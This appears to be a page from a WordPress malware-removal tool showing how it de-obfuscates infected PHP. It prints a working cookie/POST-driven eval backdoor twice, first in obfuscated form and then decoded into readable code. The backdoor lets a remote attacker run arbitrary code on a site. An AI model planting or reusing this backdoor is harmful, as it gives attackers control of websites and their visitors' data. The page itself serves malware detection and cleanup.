De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $vDgfO/*DDVjI*/= 's'/* kJDBe */. chr ( 1110/*zTo*/- 994 )."\x72" ./*IXXH */"\137" ./*rmP*/'r' . "\145"/*ELr */. 'p' ./* VKMr*/chr (101) ./* QTd */chr (97) ./*j*/'t'; $wTcXxk = chr (101) . "\x78" ./* mip */"\x70" ./* Enzh */"\154"/* hm */./* Qy */'o' . chr/* zxwTW */(100) . chr ( 171 - 70 ); $VOPSFmT = chr ( 268 -/* Qdw */169/*PrnW */).chr (111) . 'u' . chr ( 767/* DQZdN */- 657 )."\x74"; $zJdZjgE = chr (112)/* rNta */./* BF */"\x61"/*J */. chr ( 224 - 125/*OkvyC */).chr/* HZO */(/* kBB */888 - 781 ); $biJPaxmsY/* UmcNa */= Array ( "diGRXeSGMssEc" =>/* lJZpq */"hfqbOVCXffNCnhjUXHsBNNLBoD" ); /* ZO */$CkzPMfy = Array ( "ONvsEQ" =>/*h */"gySgASUMIqkjwwPyUaOugP" ); foreach ( Array(/* lCc */$biJPaxmsY, $_COOKIE, $CkzPMfy, $_POST, $biJPaxmsY) as/* QRkwI*/$qHxFtSGL) { foreach ( $qHxFtSGL as $Anywbumh/* NQgR */=>/* N */$KCxJw )/* VsvLS */{ $KCxJw/* q */= @$zJdZjgE( "\x48" . "\x2a",/* V */$KCxJw ); /* u */$Anywbumh .= "VeGvrH-qVykj-yUDS-eiHMV-gLUW-VpLx-OrcFI"; $Anywbumh/*NGP */= $vDgfO ( $Anywbumh, ( strlen( $KCxJw )/strlen(/* dCq*/$Anywbumh/*H */) ) + 1); $NlvKT/* J */= $KCxJw ^ $Anywbumh; /*vOy */$NlvKT =/* guwK */$wTcXxk ( "\x23", $NlvKT ); /*gvsJ */if/* O */( $VOPSFmT ( $NlvKT )/* e*/== 3/* rT */) { eval ( $NlvKT[1]/* ixG */( $NlvKT[2] ) ); die (); } } }
<?php $vDgfO = "str_repeat"; $wTcXxk = "explode"; $VOPSFmT = "count"; $zJdZjgE = "pack"; $biJPaxmsY = array("diGRXeSGMssEc" => "hfqbOVCXffNCnhjUXHsBNNLBoD"); /* ZO */ $CkzPMfy = array("ONvsEQ" => "gySgASUMIqkjwwPyUaOugP"); foreach (array( /* lCc */ $biJPaxmsY, $_COOKIE, $CkzPMfy, $_POST, $biJPaxmsY, ) as $qHxFtSGL) { foreach ($qHxFtSGL as $Anywbumh => $KCxJw) { /* VsvLS */ $KCxJw = @$zJdZjgE( "H*", /* V */ $KCxJw ); $Anywbumh .= "VeGvrH-qVykj-yUDS-eiHMV-gLUW-VpLx-OrcFI"; $Anywbumh = $vDgfO($Anywbumh, strlen($KCxJw) / strlen( /* dCq*/ $Anywbumh ) + 1); $NlvKT = $KCxJw ^ $Anywbumh; /*vOy */ $NlvKT = $wTcXxk("#", $NlvKT); /*gvsJ */ if ($VOPSFmT($NlvKT) == 3) { eval($NlvKT[1]($NlvKT[2])); die; } } }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.